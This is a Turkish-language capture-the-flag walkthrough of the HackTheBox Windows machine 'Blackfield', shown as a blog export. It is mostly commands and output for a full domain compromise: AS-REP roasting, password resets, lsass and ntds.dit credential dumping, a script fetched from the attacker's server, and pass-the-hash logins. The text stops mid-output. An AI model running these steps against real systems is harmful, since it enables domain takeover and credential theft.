{"id":1568,"date":"2021-09-27T16:20:21","date_gmt":"2021-09-27T16:20:21","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1568"},"modified":"2021-09-27T16:20:21","modified_gmt":"2021-09-27T16:20:21","slug":"blackfield","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/09\/27\/blackfield\/","title":{"rendered":"Blackfield"},"content":{"rendered":"<table>\n<thead>\n<tr>\n<th>Makine Ad\u0131<\/th>\n<th>Seviye<\/th>\n<th>OS<\/th>\n<th>Logo<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><a href=\"https:\/\/app.hackthebox.eu\/machines\/255\" title=\"Blackfield\">Blackfield<\/a> - HTB<\/td>\n<td>Zor<\/td>\n<td>Windows<\/td>\n<td><img decoding=\"async\" src=\"https:\/\/www.hackthebox.eu\/storage\/avatars\/7c69c876f496cd729a077277757d219d.png\" alt=\"\" \/><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Walkthrough<\/h2>\n<p>nmap taramas\u0131:<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# nmap 10.10.10.192 -p- -A -T4\nStarting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-09-26 17:24 EDT\nNmap scan report for 10.10.10.192\nHost is up (0.074s latency).\nNot shown: 65526 filtered ports\nPORT      STATE SERVICE       VERSION\n53\/tcp    open  domain        Simple DNS Plus\n88\/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-09-27 05:29:12Z)\n135\/tcp   open  msrpc         Microsoft Windows RPC\n139\/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn\n389\/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)\n445\/tcp   open  microsoft-ds?\n593\/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0\n3268\/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)\n49676\/tcp open  msrpc         Microsoft Windows RPC\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nOS fingerprint not ideal because: Missing a closed TCP port so results incomplete\nNo OS matches for host\nNetwork Distance: 2 hops\nService Info: Host: DC01; OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n|_clock-skew: 8h01m54s\n| smb2-security-mode: \n|   2.02: \n|_    Message signing enabled and required\n| smb2-time: \n|   date: 2021-09-27T05:30:08\n|_  start_date: N\/A\n\nTRACEROUTE (using port 445\/tcp)\nHOP RTT      ADDRESS\n1   74.20 ms 10.10.14.1\n2   74.18 ms 10.10.10.192\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 240.87 seconds\n<\/code><\/pre>\n<p>Bir dc oldu\u011fu belli. Protokollere g\u00f6re incelemeye ba\u015flad\u0131m ilk olrak smb ile ba\u015flad\u0131m.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]                                                                                                     \n\u2514\u2500# smbmap -H &quot;10.10.10.192&quot; -u &#039;a&#039;                                                                              130 \u2a2f  \n[+] Guest session       IP: 10.10.10.192:445    Name: 10.10.10.192                                                      \n        Disk                                                    Permissions     Comment                                 \n        ----                                                    -----------     -------                                 \n        ADMIN$                                                  NO ACCESS       Remote Admin                            \n        C$                                                      NO ACCESS       Default share                           \n        forensic                                                NO ACCESS       Forensic \/ Audit share.                 \n        IPC$                                                    READ ONLY       Remote IPC                              \n        NETLOGON                                                NO ACCESS       Logon server share                      \n        profiles$                                               READ ONLY                                               \n        SYSVOL                                                  NO ACCESS       Logon server share                      \n<\/code><\/pre>\n<p>Daha iyi bir inceleme i\u00e7in mount etmeye karar verdim.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~]                                                                                                     \n\u2514\u2500# mount -t cifs \/\/10.10.10.192\/profiles$ \/mnt\/10.10.10.192\/profiles                                            130 \u2a2f  \nPassword for root@\/\/10.10.10.192\/profiles$: <\/code><\/pre>\n<p><code>\/mnt\/10.10.10.192\/profiles<\/code> klas\u00f6r\u00fcn\u00fcn alt\u0131na gitti\u011fimde bir s\u00fcr\u00fc isim bulunmaktayd\u0131 bende bunlar\u0131 AD kullanc\u0131s\u0131 olabilir diye d\u00fc\u015f\u00fcn\u00fcp bir wordlist' aktard\u0131m.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/mnt\/10.10.10.192\/profiles]\n\u2514\u2500# ls\nAAlleni        BSamkoses       ETurgano           KAmavisca       MHoerauf        RNemnich      TKauten\nABarteski      BZandonella     EWojtila           KAtolikian      MKermarrec      RPoretsky     TKnupke\nABekesz        CAcherman       FAlirezai          KBrokinn        MKillberg       RStuehringer  TLintlop\nABenzies       CAkbari         FBaldwind          KCockeril       MLapesh         RSzewczuga    TMusselli\nABiemiller     CAldhowaihi     FBroj              KColtart        MMakhsous       RVallandas    TOust\nAChampken      CArgyropolous   FDeblaquire        KCyster         MMerezio        RWeatherl     TSlupka\nACheretei      CDufrasne       FDegeorgio         KDorney         MNaciri         RWissor       TStausland\nACsonaki       CGronk          FianLaginja        KKoesno         MShanmugarajah  SAbdulagatov  TZumpella\nAHigchens      Chiucarello     FLasokowski        KLangfur        MSichkar        SAjowi        UCrofskey\nAJaquemai      Chiuccariello   FPflum             KMahalik        MTemko          SAlguwaihes   UMarylebone\nAKlado         CHoytal         FReffey            KMasloch        MTipirneni      SBonaparte    UPyrke\nAKoffenburger  CKijauskas      GaBelithe          KMibach         MTonuri         SBouzane      VBublavy\nAKollolli      CKolbo          Gareld             KParvankova     MVanarsdel      SChatin       VButziger\nAKruppe        CMakutenas      GBatowski          KPregnolato     NBellibas       SDellabitta   VFuscca\nAKubale        CMorcillo       GForshalger        KRasmor         NDikoka         SDhodapkar    VLitschauer\nALamerz        CSchandall      GGomane            KShievitz       NGenevro        SEulert       VMamchuk\nAMaceldon      CSelters        GHisek             KSojdelius      NGoddanti       SFadrigalan   VMarija\nAMasalunga     CTolmie         GMaroufkhani       KTambourgi      NMrdirk         SGolds        VOlaosun\nANavay         DCecere         GMerewether        KVlahopoulos    NPulido         SGrifasi      VPapalouca\nANesterova     DChintalapalli  GQuinniey          KZyballa        NRonges         SGtlinas      WSaldat\nANeusse        DCwilich        GRoswurm           LBajewsky       NSchepkie       SHauht        WVerzhbytska\nAOkleshen      DGarbatiuc      GWiegard           LBaligand       NVanpraet       SHederian     WZelazny\nAPustulka      DKemesies       HBlaziewske        LBarhamand      OBelghazi       SHelregel     XBemelen\nARotella       DMatuka         HColantino         LBirer          OBushey         SKrulig       XDadant\nASanwardeker   DMedeme         HConforto          LBobelis        OHardybala      SLewrie       XDebes\nAShadaia       DMeherek        HCunnally          LChippel        OLunas          SMaskil       XKonegni\nASischo        DMetych         HGougen            LChoffin        ORbabka         Smocker       XRykiel\nASpruce        DPaskalev       HKostova           LCominelli      PBourrat        SMoyta        YBleasdale\nATakach        DPriporov       IChristijr         LDruge          PBozzelle       SRaustiala    YHuftalin\nATaueg         DRusanovskaya   IKoledo            LEzepek         PBranti         SReppond      YKivlen\nATwardowski    DVellela        IKotecky           LHyungkim       PCapperella     SSicliano     YKozlicki\naudit2020      DVogleson       ISantosi           LKarabag        PCurtz          SSilex        YNyirenda\nAWangenheim    DZwinak         JAngvall           LKirousis       PDoreste        SSolsbak      YPredestin\nAWorsey        EBoley          JBehmoiras         LKnade          PGegnas         STousignaut   YSeturino\nAZigmunt       EEulau          JDanten            LKrioua         PMasulla        support       YSkoropada\nBBakajza       EFeatherling    JDjouka            LLefebvre       PMendlinger     svc_backup    YVonebers\nBBeloucif      EFrixione       JKondziola         LLoeradeavilez  PParakat        SWhyte        YZarpentine\nBCarmitcheal   EJenorik        JLeytushsenior     LMichoud        PProvencer      SWynigear     ZAlatti\nBConsultant    EKmilanovic     JLuthner           LTindall        PTesik          TAwaysheh     ZKrenselewski\nBErdossy       ElKatkowsky     JMoorehendrickson  LYturbe         PVinkovich      TBadenbach    ZMalaab\nBGeminski      EmaCaratenuto   JPistachio         MArcynski       PVirding        TCaffo        ZMiick\nBLostal        EPalislamovic   JScima             MAthilakshmi    PWeinkaus       TCassalom     ZScozzari\nBMannise       EPryar          JSebaali           MAttravanam     RBaliukonis     TEiselt       ZTimofeeff\nBNovrotsky     ESachhitello    JShoenherr         MBrambini       RBochare        TFerencdo     ZWausik\nBRigiero       ESariotti       JShuselvt          MHatziantoniou  RKrnjaic        TGaleazza\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/mnt\/10.10.10.192\/profiles]\n\u2514\u2500# ls &gt; \/home\/kali\/Desktop\/HTB\/Windows\/10.10.10.192\/users\n<\/code><\/pre>\n<p>Daha sonras\u0131nda ak\u0131ma as-reproast sald\u0131r\u0131s\u0131 geldi ve denedim.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/\u2026\/HTB\/Windows\/10.10.10.192\/test]                                                                 \n\u2514\u2500# crackmapexec ldap 10.10.10.192 -u ..\/users -p &#039;&#039; --asreproast result --kdcHost 10.10.10.192                    1 \u2a2f  \nLDAP        10.10.10.192    389    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)\nLDAP        10.10.10.192    389    DC01             $krb5asrep$23$support@BLACKFIELD.LOCAL:baddce346affba1e06d1527007250944$38fdb239c4eeca072445d1d99b9992de43bc0cca30e5c235742537bc6b49b9295cafbf5c095cb77692aa6fb14ac895d38ef154b11615252d38\ncfafb35764215b9d8bdc0119160e653cfdc1a4afb6938eb96fa3643cef14d968838de93c17839bc3b2713f7cda9f26cfb62df588786972bf08327f5ae497bc80b6621b0ad0fa0ad9d5c6a6cc1c323f6402834f087fef27bcf6b491cc11255ffe1f53b7d2f3467a26f9ac2cc654deba2500d2fc0f690091\n856ed4758ea4e3a2ed0b3ceb2f1abdb1b3ba12a753d6a0bcd11d74ee7ee3a7dc3163c7b62fc0db8361f565566368e6ba1d8b638eba65bd8d546d3d88d93ffd0749a9ab1e\n<\/code><\/pre>\n<p>Harika! Daha sonra bu hashi k\u0131rd\u0131m.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/\u2026\/HTB\/Windows\/10.10.10.192\/hash]\n\u2514\u2500# john hash --wordlist=\/usr\/share\/wordlists\/rockyou.txt\nUsing default input encoding: UTF-8\nLoaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17\/18\/23 [MD4 HMAC-MD5 RC4 \/ PBKDF2 HMAC-SHA1 AES 128\/128 AVX 4x])\nWill run 4 OpenMP threads\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\n#00^BlackKnight  ($krb5asrep$23$support@BLACKFIELD.LOCAL)\n1g 0:00:00:12 DONE (2021-09-26 18:31) 0.07710g\/s 1105Kp\/s 1105Kc\/s 1105KC\/s #1ByNature..#*burberry#*1990\nUse the &quot;--show&quot; option to display all of the cracked passwords reliably\nSession completed\n<\/code><\/pre>\n<p>Art\u0131k bir credentiala sahibim ve bununla birlikte ldap arac\u0131l\u0131\u011f\u0131yla bloodhound \u00e7al\u0131\u015ft\u0131rabilirim.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/\u2026\/HTB\/Windows\/10.10.10.192\/blood]                                                               \n\u2514\u2500# bloodhound-python -u support -p &#039;#00^BlackKnight&#039; -ns 10.10.10.192 -d blackfield.local -c all                                                                                                                                       130 \u2a2f \nINFO: Found AD domain: blackfield.local                                                                                                                                                                                                       \nINFO: Connecting to LDAP server: dc01.blackfield.local                                                                                                                                                                                        \nINFO: Found 1 domains                                     \nINFO: Found 1 domains in the forest                                                                                                                                                                                                           \nINFO: Found 18 computers                                                                                                                                                                                                                      \nINFO: Connecting to LDAP server: dc01.blackfield.local                                                                                                                                                                                        \nINFO: Found 315 users                                                                                                  \nINFO: Connecting to GC LDAP server: dc01.blackfield.local                                                                                                                                                                                     \nINFO: Found 51 groups                                                                                                                                                                                                                         \nINFO: Found 0 trusts                                                                                                                                                                                                                          \nINFO: Starting computer enumeration with 10 workers                                                                    \nINFO: Querying computer: DC01.BLACKFIELD.local\nINFO: Done in 00M 14S\n<\/code><\/pre>\n<p>Sonu\u00e7lara bakarken a\u015fa\u011f\u0131daki sonucu buldum. audit2020 kullan\u0131c\u0131s\u0131n\u0131n paroals\u0131n\u0131 direkt olarak de\u011fi\u015ftirebiliyorum. Harika! Bunun i\u00e7in rpc'yi kulland\u0131m. Daha ayrnt\u0131l\u0131 bilgi i\u00e7in buradaki kopya ka\u011f\u0131d\u0131 incelenebilir.<\/p>\n<p>(<a href=\"https:\/\/www.willhackforsushi.com\/sec504\/SMB-Access-from-Linux.pdf\">https:\/\/www.willhackforsushi.com\/sec504\/SMB-Access-from-Linux.pdf<\/a>)<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/144.76.171.171\/blog\/wp-content\/uploads\/2021\/09\/bloodhound.png\" alt=\"\" \/><\/p>\n<p>Kullan\u0131c\u0131n\u0131n paroals\u0131n\u0131 de\u011fi\u015ftirdim.<\/p>\n<pre><code class=\"language-sh\">                                                                                                               \u2502\n\u250c\u2500\u2500(root&#x1f480;kali)-[~]                                                                                                    \u2502\n\u2514\u2500# rpcclient 10.10.10.192 -U support                                                                                  \u2502\n                                                                                                                   1 \u2a2f \u2502\nEnter WORKGROUP\\support&#039;s password:                                                                                    \u2502\nrpcclient $&gt; chgpasswd3 audit2020                                                                                      \u2502\nUsage: chgpasswd3 username oldpass newpass                                                                             \u2502\nresult was NT_STATUS_INVALID_PARAMETER                                                                                 \u2502\nrpcclient $&gt; setuserinfo2 audit2020 24 &#039;Password1&#039;                                                                     \u2502\nrpcclient $&gt;                <\/code><\/pre>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/\u2026\/Windows\/10.10.10.192\/blood\/adit]\n\u2514\u2500# crackmapexec ldap 10.10.10.192 -u audit2020 -p &#039;Password1&#039; --kdcHost 10.10.10.192 \nLDAP        10.10.10.192    389    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)\nLDAP        10.10.10.192    389    DC01             [+] BLACKFIELD.local\\audit2020:Password1 \n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/\u2026\/Windows\/10.10.10.192\/blood\/adit]\n\u2514\u2500# bloodhound-python -u audit2020 -p &#039;Password1&#039; -ns 10.10.10.192 -d blackfield.local -c all    \n\nINFO: Found AD domain: blackfield.local\nINFO: Connecting to LDAP server: dc01.blackfield.local\nINFO: Found 1 domains\nINFO: Found 1 domains in the forest\nINFO: Found 18 computers\nINFO: Connecting to LDAP server: dc01.blackfield.local\nINFO: Found 315 users\nINFO: Connecting to GC LDAP server: dc01.blackfield.local\nINFO: Found 51 groups\nINFO: Found 0 trusts\nINFO: Starting computer enumeration with 10 workers\nINFO: Querying computer: DC01.BLACKFIELD.local\nINFO: Done in 00M 14S<\/code><\/pre>\n<p>Onunlada bloodhound att\u0131m ancak pek i\u015fe yarar sonu\u00e7 gelmedi. winrm ile ba\u011flant\u0131da kuram\u0131yordum. Bunun \u00fczerine tekrara smb'ye bakt\u0131m.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# crackmapexec smb 10.10.10.192 -u audit2020 -p Password1 --shares\nSMB         10.10.10.192    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)\nSMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\\audit2020:Password1 \nSMB         10.10.10.192    445    DC01             [+] Enumerated shares\nSMB         10.10.10.192    445    DC01             Share           Permissions     Remark\nSMB         10.10.10.192    445    DC01             -----           -----------     ------\nSMB         10.10.10.192    445    DC01             ADMIN$                          Remote Admin\nSMB         10.10.10.192    445    DC01             C$                              Default share\nSMB         10.10.10.192    445    DC01             forensic        READ            Forensic \/ Audit share.\nSMB         10.10.10.192    445    DC01             IPC$            READ            Remote IPC\nSMB         10.10.10.192    445    DC01             NETLOGON        READ            Logon server share \nSMB         10.10.10.192    445    DC01             profiles$       READ            \nSMB         10.10.10.192    445    DC01             SYSVOL          READ            Logon server share <\/code><\/pre>\n<p>lsass process'inin dump'\u0131n\u0131 ald\u0131m.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/\u2026\/Desktop\/HTB\/Windows\/10.10.10.192]\n\u2514\u2500# smbclient -U audit2020 \\\\\\\\10.10.10.192\\\\forensic\nEnter WORKGROUP\\audit2020&#039;s password: \nTry &quot;help&quot; to get a list of possible commands.\nsmb: \\&gt; ls\n  .                                   D        0  Sun Feb 23 08:03:16 2020\n  ..                                  D        0  Sun Feb 23 08:03:16 2020\n  commands_output                     D        0  Sun Feb 23 13:14:37 2020\n  memory_analysis                     D        0  Thu May 28 16:28:33 2020\n  tools                               D        0  Sun Feb 23 08:39:08 2020\n\n                7846143 blocks of size 4096. 4107878 blocks available\nsmb: \\&gt; cd memory_analysis\nsmb: \\memory_analysis\\&gt; ls\n  .                                   D        0  Thu May 28 16:28:33 2020\n  ..                                  D        0  Thu May 28 16:28:33 2020\n  conhost.zip                         A 37876530  Thu May 28 16:25:36 2020\n  ctfmon.zip                          A 24962333  Thu May 28 16:25:45 2020\n  dfsrs.zip                           A 23993305  Thu May 28 16:25:54 2020\n  dllhost.zip                         A 18366396  Thu May 28 16:26:04 2020\n  ismserv.zip                         A  8810157  Thu May 28 16:26:13 2020\n  lsass.zip                           A 41936098  Thu May 28 16:25:08 2020\n  mmc.zip                             A 64288607  Thu May 28 16:25:25 2020\n  RuntimeBroker.zip                   A 13332174  Thu May 28 16:26:24 2020\n  ServerManager.zip                   A 131983313  Thu May 28 16:26:49 2020\n  sihost.zip                          A 33141744  Thu May 28 16:27:00 2020\n  smartscreen.zip                     A 33756344  Thu May 28 16:27:11 2020\n  svchost.zip                         A 14408833  Thu May 28 16:27:19 2020\n  taskhostw.zip                       A 34631412  Thu May 28 16:27:30 2020\n  winlogon.zip                        A 14255089  Thu May 28 16:27:38 2020\n  wlms.zip                            A  4067425  Thu May 28 16:27:44 2020\n  WmiPrvSE.zip                        A 18303252  Thu May 28 16:27:53 2020\n\n                7846143 blocks of size 4096. 4107878 blocks available\nsmb: \\memory_analysis\\&gt; get lsass.zip\ngetting file \\memory_analysis\\lsass.zip of size 41936098 as lsass.zip (2605.7 KiloBytes\/sec) (average 2605.7 KiloBytes\/sec)\nsmb: \\memory_analysis\\&gt; SMBecho failed (NT_STATUS_CONNECTION_RESET). The connection is disconnected now<\/code><\/pre>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/\u2026\/Desktop\/HTB\/Windows\/10.10.10.192]                                                                                                                                                                                    \u2514\u2500# pypykatz lsa minidump lsass.DMP                                                                                                                                                                                                           \nINFO:root:Parsing file lsass.DMP                                                                                                                                                                                                              \nFILE: ======== lsass.DMP =======                                                                                                                                                                                                              \n== LogonSession ==                                                                                                                                                                                                                            \nauthentication_id 406458 (633ba)                                                                                                                                                                                                              \nsession_id 2                                                                                                                                                                                                                                  \nusername svc_backup                                                                                                                                                                                                                           \ndomainname BLACKFIELD                                                                                                                                                                                                                         \nlogon_server DC01                                                                                                                                                                                                                             \nlogon_time 2020-02-23T18:00:03.423728+00:00                                                                                                                                                                                                   \nsid S-1-5-21-4194615774-2175524697-3563712290-1413                                                                                                                                                                                            \nluid 406458                                                                                                                                                                                                                                   \n        == MSV ==                                                                                                                                                                                                                             \n                Username: svc_backup                                                                                                                                                                                                          \n                Domain: BLACKFIELD                                                                                                                                                                                                            \n                LM: NA                                                                                                                                                                                                                        \n                NT: 9658d1d1dcd9250115e2205d9f48400d                                                                                                                                                                                          \n                SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c                                                                                                                                                                                \n        == WDIGEST [633ba]==                                                                                                                                                                                                                  \n                username svc_backup                                                                                                                                                                                                           \n                domainname BLACKFIELD\n                password None\n        == SSP [633ba]==\n                username \n                domainname \n                password None\n        == Kerberos ==\n                Username: svc_backup\n                Domain: BLACKFIELD.LOCAL\n                Password: None\n        == WDIGEST [633ba]==\n                username svc_backup\n                domainname BLACKFIELD\n                password None\n...\n...<\/code><\/pre>\n<p>Daha sonras\u0131nda oradan <strong>svc_backup<\/strong> kullan\u0131c\u0131s\u0131n\u0131n ntlm hash'ini ald\u0131m. Art\u0131k makineye ba\u011flant\u0131 kurabiliyorum.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]                                                                                                    \n\u2514\u2500# evil-winrm -i 10.10.10.192 -u svc_backup -H &#039;9658d1d1dcd9250115e2205d9f48400d&#039;                                     \n\nEvil-WinRM shell v3.3                                                                                                  \n\nWarning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine\n\nData: For more information, check Evil-WinRM Github: https:\/\/github.com\/Hackplayers\/evil-winrm#Remote-path-completion  \n\nInfo: Establishing connection to remote endpoint                                                                       \n\n*Evil-WinRM* PS C:\\Users\\svc_backup\\Documents&gt; cat ..\/Desktop\/user.txt                                                 \n3920bb317a0bef51027e2852be64b543                                                                                       \n*Evil-WinRM* PS C:\\Users\\svc_backup\\Documents&gt; whoami \/priv                                                                                                                                                                                   \n\nPRIVILEGES INFORMATION                                                                                                 \n----------------------                                                                                                                                                                                                                        \n\nPrivilege Name                Description                    State                                                     \n============================= ============================== =======                                                   \nSeMachineAccountPrivilege     Add workstations to domain     Enabled                                                                                                                                                                          \nSeBackupPrivilege             Back up files and directories  Enabled                                                                                                                                                                          \nSeRestorePrivilege            Restore files and directories  Enabled\nSeShutdownPrivilege           Shut down the system           Enabled                                                                                                                                                                          \nSeChangeNotifyPrivilege       Bypass traverse checking       Enabled                                                                                                                                                                          \nSeIncreaseWorkingSetPrivilege Increase a process working set Enabled       <\/code><\/pre>\n<p>SeBackupPrivilege grubuna \u00fcyeysek makine i\u00e7erisindeki b\u00fct\u00fcn dosyalar\u0131 yedekleyebiliriz anlam\u0131na geliyor e\u011fer bu makine bir DC ise ntds, e\u011fer bir client windows 10'sa sam dosyas\u0131 gibi dosyalarda dahil olmak \u00fczere. <a href=\"https:\/\/medium.com\/r3d-buck3t\/windows-privesc-with-sebackupprivilege-65d2cd1eb960\">https:\/\/medium.com\/r3d-buck3t\/windows-privesc-with-sebackupprivilege-65d2cd1eb960<\/a> adresinde asl\u0131nda nas\u0131l exploit edilece\u011fi anlat\u0131lm\u0131\u015f. Bizde ayn\u0131 y\u00f6nergeleri izleyece\u011fiz.<\/p>\n<pre><code class=\"language-sh\">                                        1 \u2a2f\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/\u2026\/Desktop\/HTB\/Windows\/10.10.10.192]\n\u2514\u2500# cat back_script.txt                                                                                         130 \u2a2f\nset verbose onX\nset metadata C:\\Windows\\Temp\\meta.cabX\nset context clientaccessibleX\nset context persistentX\nbegin backupX\nadd volume C: alias cdriveX\ncreateX\nexpose %cdrive% E:X\nend backupX\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/\u2026\/Desktop\/HTB\/Windows\/10.10.10.192]\n\u2514\u2500# python3 -m http.server 80\nServing HTTP on 0.0.0.0 port 80 (http:\/\/0.0.0.0:80\/) ...\n10.10.10.192 - - [27\/Sep\/2021 11:27:49] &quot;GET \/back_script.txt HTTP\/1.1&quot; 200 -\n<\/code><\/pre>\n<p>E diskini olu\u015fturduk ve i\u015flemlerimize art\u0131k oradan devam edece\u011fiz. Bu dosyay\u0131 windows'a kopyalamal\u0131y\u0131z. Bunun i\u00e7in ben bir http sunucusu olu\u015fturdum.<\/p>\n<pre><code class=\"language-sh\">\n*Evil-WinRM* PS C:\\Users\\svc_backup\\Documents&gt; Invoke-WebRequest -Uri http:\/\/10.10.14.20\/back_script.txt -OutFile C:\\Us  \ners\\svc_backup\\Documents\\back_script.txt   \n\n*Evil-WinRM* PS C:\\Users\\svc_backup\\Documents&gt; diskshadow \/s back_script.txt                                             \nMicrosoft DiskShadow version 1.0                                                                                         \nCopyright (C) 2013 Microsoft Corporation                                                                                 \nOn computer:  DC01,  9\/27\/2021 4:30:13 PM                                                                                \n\n-&gt; set verbose on                                                                                                        \n-&gt; set metadata C:\\Windows\\Temp\\meta.cab                                                                                 \n-&gt; set context clientaccessible                                                                                          \n-&gt; set context persistent                                                                                                \n-&gt; begin backup                                                                                                          \n-&gt; add volume C: alias cdrive                                                                                            \n-&gt; create                                                                                                                \nExcluding writer &quot;Shadow Copy Optimization Writer&quot;, because all of its components have been excluded.                    \nComponent &quot;\\BCD\\BCD&quot; from writer &quot;ASR Writer&quot; is excluded from backup,                                                   \nbecause it requires volume  which is not in the shadow copy set.                                                         \nThe writer &quot;ASR Writer&quot; is now entirely excluded from the backup because the top-level                                   \nnon selectable component &quot;\\BCD\\BCD&quot; is excluded.                                                                         \n\n* Including writer &quot;Task Scheduler Writer&quot;:                                                                              \n        + Adding component: \\TasksStore                                                                                  \n\n* Including writer &quot;VSS Metadata Store Writer&quot;:                                                                          \n        + Adding component: \\WriterMetadataStore                                                                         \n\n* Including writer &quot;Performance Counters Writer&quot;:                                                                        \n        + Adding component: \\PerformanceCounters                                                                         \n...\n...<\/code><\/pre>\n<pre><code class=\"language-sh\">*Evil-WinRM* PS C:\\Users\\svc_backup\\Documents&gt; robocopy \/b E:\\Windows\\ntds . ntds.dit                                    \n\n-------------------------------------------------------------------------------                                          \n   ROBOCOPY     ::     Robust File Copy for Windows                                                                      \n-------------------------------------------------------------------------------                                          \n\n  Started : Monday, September 27, 2021 4:32:15 PM                                                                        \n   Source : E:\\Windows\\ntds\\                                                                                             \n     Dest : C:\\Users\\svc_backup\\Documents\\                                                                               \n\n    Files : ntds.dit                                                                                                     \n\n  Options : \/DCOPY:DA \/COPY:DAT \/B \/R:1000000 \/W:30                                                                      \n\n------------------------------------------------------------------------------                                           \n\n                           1    E:\\Windows\\ntds\\                                                                         \n            New File              18.0 m        ntds.dit                                                                 \n  0.0%                                                                                                                   \n  0.3%\n  ...\n  ...\n  100%\n  ```\n\n```sh\n\n*Evil-WinRM* PS C:\\Users\\svc_backup\\Documents> reg save hklm\\system C:\\Users\\svc_backup\\Documents\\system.bak             \nThe operation completed successfully.  <\/code><\/pre>\n<pre><code class=\"language-sh\">\n*Evil-WinRM* PS C:\\Users\\svc_backup\\Documents> download ntds.dit                                                         \nInfo: Downloading ntds.dit to .\/ntds.dit                                                                                 \n\nInfo: Download successful!     <\/code><\/pre>\n<pre><code class=\"language-sh\">*Evil-WinRM* PS C:\\Users\\svc_backup\\Documents> download system.bak                                                       \nInfo: Downloading system.bak to .\/system.bak                                                                             \n\nInfo: Download successful!<\/code><\/pre>\n<p>Dosyalar\u0131 elde ettiten sonra credentiallar\u0131 okudum.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/usr\/share\/doc\/python3-impacket\/examples]                                                                                                                                                                                    \n\u2514\u2500# python3 secretsdump.py -ntds \/root\/ntds.dit -system \/root\/system.bak local                                                                                                                                                                \nImpacket v0.9.22 - Copyright 2020 SecureAuth Corporation                                                                                                                                                                                      \n\n[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393                                                                                                                                                                                 \n[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)                                                                                                                                                                                 \n[*] Searching for pekList, be patient                                                                                                                                                                                                         \n[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c                                                                                                                                                                             \n[*] Reading and decrypting hashes from \/root\/ntds.dit                                                                                                                                                                                         \nAdministrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::                                                                                                                                                        \nGuest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::                                                                                                                                                                \nDC01$:1000:aad3b435b51404eeaad3b435b51404ee:5d27ca03d3f067ec45c2d2800a12b409:::                                                                                                                                                               \nkrbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::                                                                                                                                                               \naudit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa:::                                                                                                                                                           \nsupport:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::    \n...\n...<\/code><\/pre>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# evil-winrm -i 10.10.10.192 -u Administrator -H '184fb5e5178480be64824d4cd53b99ee'\n\nEvil-WinRM shell v3.3\n\nWarning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine\n\nData: For more information, check Evil-WinRM Github: https:\/\/github.com\/Hackplayers\/evil-winrm#Remote-path-completion\n\nInfo: Establishing connection to remote endpoint\n\n*Evil-WinRM* PS C:\\Users\\Administrator\\Documents> cd ..\/Desktop\n*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> ls\n\n    Directory: C:\\Users\\Administrator\\Desktop\n\nMode                LastWriteTime         Length Name\n----                -------------         ------ ----\n-a----        2\/28\/2020   4:36 PM            